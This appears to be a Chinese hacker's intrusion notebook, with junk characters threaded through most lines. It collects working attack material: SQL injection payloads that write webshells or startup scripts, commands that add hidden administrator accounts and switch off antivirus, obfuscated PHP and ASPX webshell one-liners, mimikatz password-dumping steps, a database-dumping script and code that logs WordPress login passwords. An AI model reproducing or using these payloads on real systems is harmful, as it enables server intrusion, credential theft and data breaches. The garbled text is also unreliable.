5 o7 T$ ?0 S& [7 i% i% V# saccess中导出shell5 j1 t! u2 c8 p) s6 Q
) o# G. o; A, h& H& U ?
中文版本操作系统中针对mysql添加用户完整代码:
% ]! y1 w9 ~+ X( K
% I- b" M p, s' R6 ]7 e3 _) juse test;" A1 Y% h3 m: x) ?
create table a (cmd text);
* U* k! W9 P; h3 i. b* J. ginsert into a values ("set wshshell=createobject (""wscript.shell"") " );
% w$ d: N: `: g6 C) v2 E' Tinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
' Z* q1 e2 e' b0 c9 M0 Ginsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
, \9 P" R% m% ^- j1 |7 {select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";! c8 ]- U( t/ \- u' i# ]% Y8 c
drop table a;+ u' n. q+ ?: @. X+ w# x, p6 F) S9 m
, N: H$ u( d u) r' G4 ~$ f1 Q英文版本:2 f$ S3 c7 T g/ B
/ W, v; J8 b- N
use test;% `8 S2 q1 V+ @" ]9 `( R3 g
create table a (cmd text);
( p7 m8 G5 v1 N2 ~+ t+ Z$ Z3 zinsert into a values ("set wshshell=createobject (""wscript.shell"") " );/ u( T9 l' a0 w
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );8 V( p" Q, v. P; F8 F! [
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
# _$ [2 R( p; {. \& |( xselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";7 `# C+ M5 z- f4 ?2 D, V
drop table a;
( G% x5 @/ B6 d# ^) i1 {: g* j- S( G5 B" I: L: D1 i
create table a (cmd BLOB);' A' ~" R- d+ a. S( ~! y
insert into a values (CONVERT(木马的16进制代码,CHAR));; \7 l/ y" V2 o" B
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe': P; d) g: Q$ t
drop table a;
( ^6 j9 E( I& A+ ?5 Y9 |
8 V5 v/ Z. V) l3 _, h9 {记录一下怎么处理变态诺顿
9 B m% P! l3 e; j9 z8 f h查看诺顿服务的路径2 N% o- z) s4 I* }6 v
sc qc ccSetMgr
) K5 n" m6 r5 i# Z* d; S然后设置权限拒绝访问。做绝一点。。
1 ]% m& J7 n- k' s7 [ P. j4 Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system" q7 M- b5 m9 M+ |! }. j
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"% R3 q5 t( I: z' x j# P/ m5 H
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
+ R- V R7 r }# fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
: c" i8 ~7 S( p# @
7 N! C0 b8 J! g S& g' J$ Y/ Z然后再重启服务器; W5 T% L c! m% v4 j! v3 y
iisreset /reboot) x! A2 c6 \( X b% ], J& T
这样就搞定了。。不过完事后。记得恢复权限。。。。# K1 q/ i' r) Y# r2 |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F' v3 N1 `/ w+ @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F8 l) `$ m* C5 B7 w# o& R
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
. i- a# M t E0 jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
( T4 D; ]* P6 ?% oSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin, ~7 K2 Q% Y' v+ A) N* J/ C' L
' H/ m4 ?1 l( ^( w; S' u) P X, z+ M/ ZEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')4 R9 H# \: [& v0 r
, R# h/ j# C7 Q1 i% A! Jpostgresql注射的一些东西% s3 a0 ] ^6 Z% w
如何获得webshell
2 @; L7 F0 T3 d) b) y5 Z( `http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); + ` p( O0 X6 c: T7 [
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 i! N. g5 {7 v1 v% M* u1 |/ b: {http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
% t+ f* v0 }+ J- w$ d; c( O; l- W如何读文件
2 J& T+ N* t, q5 I0 \/ a2 Yhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);4 z7 i6 S+ T4 c* I4 x t
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
" L! K% K* _1 e/ ohttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
$ \# p& t. k8 [; T1 [
0 F% }' P* x# j/ F/ F- A* `z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
/ e% a0 e" X& P当然,这些的postgresql的数据库版本必须大于8.X7 v% G* ?1 d+ L0 ~6 Y
创建一个system的函数:; L. b$ e- z+ |* k
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
% h2 t/ X0 H/ ?5 ?/ Y+ S
4 D- P7 x% a3 y: r创建一个输出表:+ ^* v9 y- D8 t6 V* Q- H- r2 K
CREATE TABLE stdout(id serial, system_out text)
8 z0 `8 V B; {9 z- x) b' F/ [1 ?2 G
执行shell,输出到输出表内:& x' Q' p+ z" R; N4 K
SELECT system('uname -a > /tmp/test')
- ^4 I2 Z) Z k6 d$ @4 m: \ N- b% L
copy 输出的内容到表里面;
( o( `% d5 y: s8 nCOPY stdout(system_out) FROM '/tmp/test'6 n$ Z: {. D% c* }
& q7 r4 x3 b2 A. S" H4 o( f从输出表内读取执行后的回显,判断是否执行成功
/ t+ K- _4 C+ w8 r Q; p2 h& D' s
9 i9 y& [* Y; r( |6 _9 jSELECT system_out FROM stdout
{: [* S2 T* n; T下面是测试例子; ]4 t- }3 W) L( a r7 `
/ X4 N) {. ]1 \2 b' A; l/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ; a5 ~1 U9 B1 Z2 s+ D2 u, p: p4 T
2 N/ @3 C" o. i
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'0 {5 a" r' g3 V- N; l
STRICT --
4 ^5 N1 g+ I- E9 {1 e1 ?
5 J2 G+ F% [" ^ o$ W& t/store.php?id=1; SELECT system('uname -a > /tmp/test') --& {. g6 g9 J( L4 G) H/ L/ X, j
! [1 O8 p( e3 h6 i o0 M/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
2 Y$ F9 ?* c6 _% a6 h0 x% o1 |! a6 F0 h9 `0 r" V- [
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--. W [ @. B1 c3 f$ X/ K0 G
net stop sharedaccess stop the default firewall
2 W# t8 _- d% N5 p* C$ \netsh firewall show show/config default firewall
9 G- m+ E* Q: C- Y& }9 ]2 w) Nnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
; \8 { m, R: t, h" Q6 jnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall0 G' I# w8 h& S7 n2 Q
修改3389端口方法(修改后不易被扫出)
1 ?6 c8 {" E, A0 y* r* s6 ]修改服务器端的端口设置,注册表有2个地方需要修改
, Q. n: t: Q0 o& @2 I" W! h% J7 P, {% S( E1 S, D
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
" w+ T( q) V/ H2 R3 ?$ T8 D! a* V3 dPortNumber值,默认是3389,修改成所希望的端口,比如6000
, `) F% P/ `7 h" g# u( {. }3 S) t
1 u( b$ N/ O, a第二个地方:
& ~: U6 H/ }& G3 N! }- R! C[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
! G# @ x, y) F2 X7 `4 Z; ~PortNumber值,默认是3389,修改成所希望的端口,比如6000
, a( F" D+ A; E! v8 s! A; {4 I$ z# p4 `0 {4 @ i- g5 i& |
现在这样就可以了。重启系统就可以了
- {/ P, I4 D1 a: a. p/ C) S1 U9 {0 J6 _9 H
查看3389远程登录的脚本
6 l$ I7 r! z7 t8 P+ F保存为一个bat文件
+ g6 D, P. X& n3 V& @" a3 P0 Z( {) t' ]date /t >>D:\sec\TSlog\ts.log
5 ^ ~ W* Q+ _! x0 ~time /t >>D:\sec\TSlog\ts.log
# `, G8 t2 S0 `' Z0 c* anetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log, h, m1 L3 s7 c+ }- l
start Explorer
6 L- i" `" c# |& f+ E$ V, ~& V3 d
mstsc的参数:: b6 Q- [$ ?, X# D5 u
R+ @6 z" p9 @- p7 Y
远程桌面连接
% n* q5 V+ h# A) R& s; s, s5 Y. n6 W! Y+ B. e, o* D% {
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]- Y6 D' h3 c- P
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
0 Y1 ^5 u U" g7 n
! s" v* d, Z) ?2 K& X2 Z<Connection File> -- 指定连接的 .rdp 文件的名称。
. g m3 U% F' U+ B9 g; N2 L+ O8 y6 P1 Q
/v:<server[:port]> -- 指定要连接到的终端服务器。
2 E- V- @ N: y3 ~4 g `: K' g5 k9 q' P. F% R* I( G" b
/console -- 连接到服务器的控制台会话。
7 G' G9 t" m- H! s' k6 |5 D. k
9 l! Z& j9 N5 h/f -- 以全屏模式启动客户端。
7 d( @" u0 v1 d$ X7 J- P6 k
9 c# K, f; g% v1 C3 Y+ v( e$ k/w:<width> -- 指定远程桌面屏幕的宽度。
$ ~7 G, O, |$ Y# f8 k& }' K# y1 q- l. f) V
/h:<height> -- 指定远程桌面屏幕的高度。6 s. d% Q$ |4 O$ e* X/ @% k; V
" x, h" }7 f4 `$ n2 i8 U
/edit -- 打开指定的 .rdp 文件来编辑。6 F9 y$ {" L. w) f
A$ J0 T& o+ G, V, o. F$ h; E! l/migrate -- 将客户端连接管理器创建的旧版. T6 t7 t% v( t
连接文件迁移到新的 .rdp 连接文件。
5 ]2 Y* @7 ~2 J7 N- |! ?. m1 `- V+ c
& U, m4 p2 i/ W
8 o; F( N7 a$ w9 I6 V其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
; x4 Z4 h4 n9 J2 [" U8 Y5 fmstsc /console /v:124.42.126.xxx 突破终端访问限制数量" K. `. c9 g; z( [* i1 C7 m; |6 T
: p+ J* v, z( S. Z3 v命令行下开启3389# X# y0 h3 g& t U* z% b' Y
net user asp.net aspnet /add- z5 ]7 q! D# k% X
net localgroup Administrators asp.net /add
+ O! G7 M& [9 R8 e1 Pnet localgroup "Remote Desktop Users" asp.net /add. J0 Q4 s2 n. k( R \
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
& z5 @# f) S S$ Jecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
% y# D; R4 y% U: `* e6 C5 Lecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1% B7 {# W, C8 c5 r
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
, d2 H/ N o; X$ v- l; Esc config rasman start= auto
( Y* z2 T. }" ~& C4 o& zsc config remoteaccess start= auto
3 U0 e- [7 V4 `# a" F/ `+ Tnet start rasman4 \. a+ q; [6 m7 n' i
net start remoteaccess3 Q" J8 a5 M; y6 J
Media) J% L2 b1 [; B! O+ n" v$ ]8 K! d* l6 s o
<form id="frmUpload" enctype="multipart/form-data"
0 p- b. ?* @2 W2 A! Yaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>3 ?* J6 k" @' M) N6 s) W! o2 r
<input type="file" name="NewFile" size="50"><br>2 [/ D+ r% t) Y& q5 g# C
<input id="btnUpload" type="submit" value="Upload">
7 @: m2 j" n- ]4 l7 L</form>( M& j) w/ ^3 J8 g/ t' z' I
" U* C3 i! l% I% w& }9 }
control userpasswords2 查看用户的密码; |' M, e1 ?. H, K
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径! j9 s, e- [% w; c$ B% b
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a7 ?* r" a5 ^8 h2 L, l8 r7 d
# ~: y$ ]5 B3 T8 K9 a' k141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:5 f8 v# f; w7 o1 [
测试1:4 n4 A& X w( k
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1/ z f9 e( x7 s# t
5 H. x" X0 N! E9 O) }4 L测试2:' ]3 T4 f. \+ v2 m8 F5 [5 W( V1 y
' e( t* w: k5 D* K4 Q. T
create table dirs(paths varchar(100),paths1 varchar(100), id int)
2 |0 x% s6 q9 w& B8 q8 l* I+ k9 ^' x- l4 i1 t6 [( }: J
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
3 T4 A k# y4 w3 h, g; c: @
- D# J9 F$ z$ ^# o7 d5 v* xSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
`" U p) f1 g) }; d& D7 K( D关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令4 w1 q! J$ S& U( L- Q( o3 E/ B' [! b# v
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制; H, M$ q& L0 _. k. t
net stop mcafeeframework
$ M7 |) [1 f& F. M' O* |$ A& B$ hnet stop mcshield2 H" s( Q- }8 c% K- L& p9 E
net stop mcafeeengineservice# o% J/ z. ^" }! T
net stop mctaskmanager. f& s5 t+ H+ n3 G8 X8 K1 Y) a) }# v! _
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D5 I% I+ H( P5 T
0 s7 M% h6 u, E- ]
VNCDump.zip (4.76 KB, 下载次数: 1)
& F! l4 I' d d密码在线破解http://tools88.com/safe/vnc.php( Z2 d% t' \6 N. x2 A
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
, y" ?( g' R4 v S a
6 B1 {3 R+ \" u9 f0 a7 Vexec master..xp_cmdshell 'net user'
# y1 I9 Q8 {( C- d& ~- B" S0 jmssql执行命令。
0 d5 _) y0 \0 } \+ U9 X获取mssql的密码hash查询
7 E% J% W9 G, lselect name,password from master.dbo.sysxlogins2 Z# [ |1 C; f
8 a4 P& ^$ n. U' Z
backup log dbName with NO_LOG;
3 U# w9 P7 J: o! E" ?% |/ sbackup log dbName with TRUNCATE_ONLY;! p# R: d0 p: d( @; M, o# t
DBCC SHRINKDATABASE(dbName);5 I; h" H3 f9 T) y
mssql数据库压缩
- M+ L6 V2 E( P* h3 e' V
1 C2 x& n- Y) ^' oRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
9 |/ x [ y/ }( d' m将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。6 @' a$ ?0 }6 A+ O; `
! n5 i% ~0 G; g. T
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
# z" V/ y( j3 ^备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
" ~. R2 @ u* k; Q% p* a
9 v4 W G4 ^1 s+ {5 t& U- r5 Z+ ~Discuz!nt35渗透要点:
) M" X3 ^0 _7 N# H0 I(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
: Z% x" C& |# g, m& C. V2 K/ ^! X(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
% d& J2 i3 Q' s- O Q(3)保存。
1 n% _7 W6 K1 N+ t/ N6 m(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
9 z+ S% S' ^1 B" c+ \d:\rar.exe a -r d:\1.rar d:\website\8 W# V; {5 y+ h- \; I7 G, a6 E' t
递归压缩website
# i1 n& U6 j$ F* H+ u注意rar.exe的路径( L! A8 w* y$ H" w* k7 R
' s$ v3 C' }# O1 B) ^% G) j
<?php
7 q! J) W* s; M* r' M% l: x; m0 } `2 H: h2 L' k
$telok = "0${@eval($_POST[xxoo])}";0 ]2 D' U; J) R% |# J
. u, f5 O! @8 U/ a F, W- Q
$username = "123456";
$ n; h3 n7 _2 v/ l7 M/ \. G* _3 z v
$userpwd = "123456";
% t+ T- p0 a9 B' b/ M2 H. x) } ]% n2 T6 I0 G7 G; ^
$telhao = "123456";9 E) {+ B: p. h! ~: z
+ c, Y# O% `6 @; u2 x; x
$telinfo = "123456";
0 `* J" e- S1 U+ Y3 W( k# m0 n2 D7 |% L8 K k# q
?>
# D+ }* }9 E, _php一句话未过滤插入一句话木马' K# I" \; q& X8 [
! D& ~/ t. j* K站库分离脱裤技巧0 ~' `% o3 @4 t2 Y' _1 e! f' q5 V
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
" P9 p0 O8 ` W( J" L$ iexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'. `% o7 X% E; Q8 c' r
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。& @4 K9 X6 F6 \5 L1 g: O3 Q% B
这儿利用的是马儿的专家模式(自己写代码)。
- `9 c: G5 R/ @& D+ z4 e$ Hini_set('display_errors', 1);2 s& U" f1 c1 C k7 z2 e
set_time_limit(0);
; m8 R- y2 I$ E. G t+ ierror_reporting(E_ALL);# _1 a; {' Z r. g; ~
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
. ]4 |5 N6 d. g# y6 Xmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());$ z: J k5 `7 {2 @1 t
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
. c6 \' F5 p. u- V% ]$i = 0;
6 c/ }& }! B: J( d" e9 o6 v$ c( X$tmp = '';
5 X# Y0 W0 d" z2 ?while ($row = mysql_fetch_array($result, MYSQL_NUM)) {8 C& o P6 }7 V
$i = $i+1;
; Z& ]6 f( R8 M2 U $tmp .= implode("::", $row)."\n";( r1 j' a' x' X4 }2 i' _
if(!($i%500)){//500条写入一个文件* x3 [$ Z# a! T |& c
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
4 Z4 l, M- ~9 S& m9 X H6 I file_put_contents($filename,$tmp);
8 [& n) j: V2 A( F# ?; Y& h $tmp = '';* ~0 _- S8 ^5 a* T
}; m4 Q5 A6 t7 u/ ~, X/ Y3 t
}
# _6 N2 r2 j; d: z, a9 P* q! {) Dmysql_free_result($result);
" C+ Y4 ~ T; ^; ^& }" V, y, R0 ? D' c N5 }) a
6 I; |! P3 G' |# w' C& e2 c) I' J+ n9 M& \: b
$ r& v2 x' V4 Q; p5 _$ y
//down完后delete
! E4 J" Y/ f9 U9 ~* y$ y$ b8 A6 _! |/ s3 x: n
" k' W: [" S+ ~5 O kini_set('display_errors', 1);( J" C9 L& N% r8 @9 c
error_reporting(E_ALL);
7 r& G1 N6 x' p5 ^$i = 0;
$ @' N/ q( w7 i' c7 }while($i<32) {" B% F: w* w: Q1 o% x4 k6 ?
$i = $i+1;* e( i; @2 V8 k/ k7 F& x. I2 F
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
L) I0 W+ d7 U) C* ^: q unlink($filename);
) |, d- z# A5 A3 {* e! v9 o( j}
* I5 u0 i* l& \9 rhttprint 收集操作系统指纹. z# N q7 {* n( g6 k/ o
扫描192.168.1.100的所有端口/ m% ], P8 O) U B8 b1 W* y/ I. z
nmap –PN –sT –sV –p0-65535 192.168.1.100/ C& T' N, p+ x9 K/ W! e( q; C
host -t ns www.owasp.org 识别的名称服务器,获取dns信息$ i3 X$ e# m- K# d6 J; ?$ W) |& s
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
" V: g9 O- a& h9 i/ [Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
. ` {* Y& L# K# [3 H( Y8 m8 k) b2 N' L0 z* }
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册); L# d* q& T% F, j: V! |0 y4 |# `7 y Y6 u
" V- |: }( h' l T: k' B; B MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
0 v7 L/ l3 u+ k" _6 ?, S) n8 h
- ~. p. `3 \' k, e Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
( Q" r5 A" D2 y9 H8 N
- ] t+ c9 S* ~* Q2 \7 q$ p& w DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
[) M) o% G( K; F/ N4 H `. O/ W# ~! u# s: P# G- O
http://net-square.com/msnpawn/index.shtml (要求安装)
- y R3 v/ B1 K, J% E
7 o$ @9 L4 ` s+ z tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
5 Q% e6 b6 o* U. |% `% Q& T5 I! E( A6 R9 g, \ e6 _# }, K
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找): q3 n3 `/ T7 k- p
set names gb2312" K/ N+ }2 x8 \" i2 H
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。! x2 ~7 \4 ^; C2 o9 E! o
( t, r/ R/ C/ X# J: U
mysql 密码修改5 R2 v2 a! x# n/ \( w" |( Y
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
! [7 x9 {3 s% a% {$ P) eupdate user set password=PASSWORD('antian365.com') where user='root';
D# R# E; b+ X4 m, oflush privileges;
8 k$ A* m5 `( L% Z高级的PHP一句话木马后门, o, r# Y( g: u
* m Z$ N8 u# e" w& S+ B
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
( X8 {" u! N; Y; z% d! ~. ~ z* r2 j, g
1、
. U3 \% j+ V9 o; Z; o, u# X
7 t b: m' J2 w; F9 I$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 I8 V8 C# l" u
1 u( s6 v% @5 c" G: F' S
$hh("/[discuz]/e",$_POST['h'],"Access");
# X7 ^- M8 ?& L- ?' N8 S- X- J- u5 v, }; [% e- C1 b
//菜刀一句话! G; e. j" }6 i+ ^8 r9 |
1 l. h, R" z# x' @# A. F2、
1 N" v4 H8 m+ |9 M# P0 k, u4 [' o8 F
$filename=$_GET['xbid'];; G+ }0 X/ \5 C" B% C8 O1 B
+ X: D; ?) C+ M+ R, U8 f: T
include ($filename);, Q ?3 W* X0 }. [* Q' q
k3 d' r$ k6 c
//危险的include函数,直接编译任何文件为php格式运行
7 w$ d: N4 o9 r; n+ M
" p m w+ Y) R2 @- @, d, f3、2 ]% `3 j# l' |7 R3 p" \* q8 K* r& H
9 A h) F: R3 o8 V- d$reg="c"."o"."p"."y";7 @. O% x7 h* z4 {
7 R _! _* v- @8 ]2 ~$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);- k) H- L$ p9 L. o, j$ m8 f
6 r; r9 V$ M. D+ j//重命名任何文件
: T7 d( O& H/ c5 D
- ^1 x% M9 |8 F3 g4、
; H' p" Z3 R& T9 Z7 U3 h( B: J) ]* P& T7 w% |1 L5 c
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
# \" v+ B! z" J( r& C# q' j. ?8 p5 q8 g E+ ]. \
$gzid("/[discuz]/e",$_POST['h'],"Access");6 Q( T# w( p% \$ @% [- H
' u( L( ]- v% V//菜刀一句话
; w! Q. o: }- r& i4 ]* P6 X* q
* e* x0 J$ R" G9 J5、include ($uid);7 @% L) u3 i \$ Y
5 e( r, L0 O+ [$ w( Y
//危险的include函数,直接编译任何文件为php格式运行,POST # u9 X" J4 M9 u, F# a
" E! L' S& \$ `* I5 U0 G4 \7 K
. [( g: @3 S% Y1 v; A+ c//gif插一句话+ i7 Q( l' ]8 w, t) P
& N* l: b* Q& n! j* P6、典型一句话9 M8 E `/ Y9 k" k7 `+ u- d% j
/ B& s8 _+ R* C程序后门代码1 H8 s3 N- C9 K# ^5 o) ~
<?php eval_r($_POST[sb])?>9 g8 ~6 ~8 }9 K4 z2 Z' {9 O
程序代码
, W& a+ Y+ P7 H1 y<?php @eval_r($_POST[sb])?>
- S# M; M! w* O- [0 f, o; }//容错代码! o$ }$ ^; h: [' @+ g% k
程序代码+ N: P! c9 v' Z9 X0 v. h* z
<?php assert($_POST[sb]);?>5 S) X: w2 Y5 e6 I; q
//使用lanker一句话客户端的专家模式执行相关的php语句8 U, N' i5 @9 |; E5 d4 K' W
程序代码
8 d4 q6 a4 V$ Z<?$_POST['sa']($_POST['sb']);?>
6 a- o: B) X, T! c程序代码
, [" h5 @, H) D. S<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
/ O8 ^% {) b1 V8 l) M0 v程序代码
, s9 e) ]. c0 W5 F5 q<?php
9 O$ K5 j1 s# q7 {, h N9 m@preg_replace("/[email]/e",$_POST['h'],"error");* w% j7 m( o1 k3 g, V* a* Y
?>* r s* W7 k2 a% a0 u/ e3 s
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
, x1 o& Z3 I, V- z, K2 {! Y程序代码7 r/ k& x) z6 ^! ?: R% [
<O>h=@eval_r($_POST[c]);</O>
0 d( { }* \+ q% H程序代码) H: [- q8 _" ~
<script language="php">@eval_r($_POST[sb])</script> [8 P' s" s6 C2 q1 [
//绕过<?限制的一句话
/ ~6 n9 c/ C9 K2 D
0 T; t, x7 E) M) y0 |( g( }http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
( d# y4 `: P) I9 i. Q: o( I详细用法: \/ M' h' G- X( }$ T% u
1、到tools目录。psexec \\127.0.0.1 cmd0 x7 x& B$ ?1 o
2、执行mimikatz
+ j3 E9 j; m3 d: Y: u3、执行 privilege::debug
6 T0 z% K0 x/ n, P' w! J5 Z, h/ B' `4、执行 inject::process lsass.exe sekurlsa.dll
" L ^1 y( p3 ^% u' A. i5、执行@getLogonPasswords) v& e7 |- a# s! o" [* O; }1 q* S
6、widget就是密码. E$ b, K+ a3 j6 x
7、exit退出,不要直接关闭否则系统会崩溃。! H* i9 i; h% | j( ~3 X' z8 t
3 F1 ^/ T. T: P5 e0 P
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
! F5 T2 t0 Q0 {& U: x3 z' c0 p$ L+ G' ]4 Q7 q* G
自动查找系统高危补丁( T, i3 L* s& _& r \! n
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt. M5 j4 E+ `/ q! ^" B& H/ _: D
4 V) D* U6 u9 u
突破安全狗的一句话aspx后门, K! ~6 u% s$ u# @6 v" e: ~ l6 K
<%@ Page Language="C#" ValidateRequest="false" %>- F1 \) T/ l4 \ A
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>0 C- u% O1 D! R0 Y; i
webshell下记录WordPress登陆密码
( c0 P8 v; o& S! \webshell下记录Wordpress登陆密码方便进一步社工
- c+ Q9 R7 S% T) H在文件wp-login.php中539行处添加:
% |; J% e/ C# o4 j( Q ]// log password9 k: D, d/ a' ]4 U' A6 K- g
$log_user=$_POST['log'];# x' I. A; ~4 {" F# l3 e6 N J
$log_pwd=$_POST['pwd'];6 l: V" V4 Q3 ^
$log_ip=$_SERVER["REMOTE_ADDR"];1 W6 v- R! X! d0 i( B2 E- F: k
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
2 L, k/ ^+ U% w% H, u& j0 j$txt=$txt.”\r\n”;2 l9 ?/ r. S7 x7 w
if($log_user&&$log_pwd&&$log_ip){8 f: K. o! O( L. ]3 e
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
( I$ s3 Z3 p4 ], X3 Y% w}
! [; v7 b7 R2 x/ {当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
( n/ _: {* ? s就是搜索case ‘login’! Y( {! O8 `( b, I/ ~6 A& u
在它下面直接插入即可,记录的密码生成在pwd.txt中,
